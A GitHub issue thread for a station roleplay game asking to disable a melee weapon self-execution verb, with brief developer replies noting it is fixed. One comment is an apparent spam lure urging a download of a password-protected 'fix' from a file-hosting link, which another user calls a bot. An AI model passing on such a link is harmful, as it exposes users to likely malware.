### ISSUE TITLE
Melee weapon self execution disable

### ISSUE THREAD

**Issue by BlitzTheSquishy** [DeltaV-Station/Delta-v#1690]
## Description

Thing breaks rules, make it go away please :)

**Reproduction**

Rightclick self with a weapon press execute

**Screenshots**

**Additional context**

Suicide RP breaks server rules, similar feature has been disabled on yourself, with a ranged weapon. So this should be disabled as well.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by therealDLondon** [comment]
Die, bot

**Comment by deltanedas** [comment]
it doesnt let you actually do it, just needs the verb to have the same check

**Comment by BlitzTheSquishy** [comment]
> it doesnt let you actually do it, just needs the verb to have the same check

there was people who did actually do it so... yeah, anyway, this is fixed
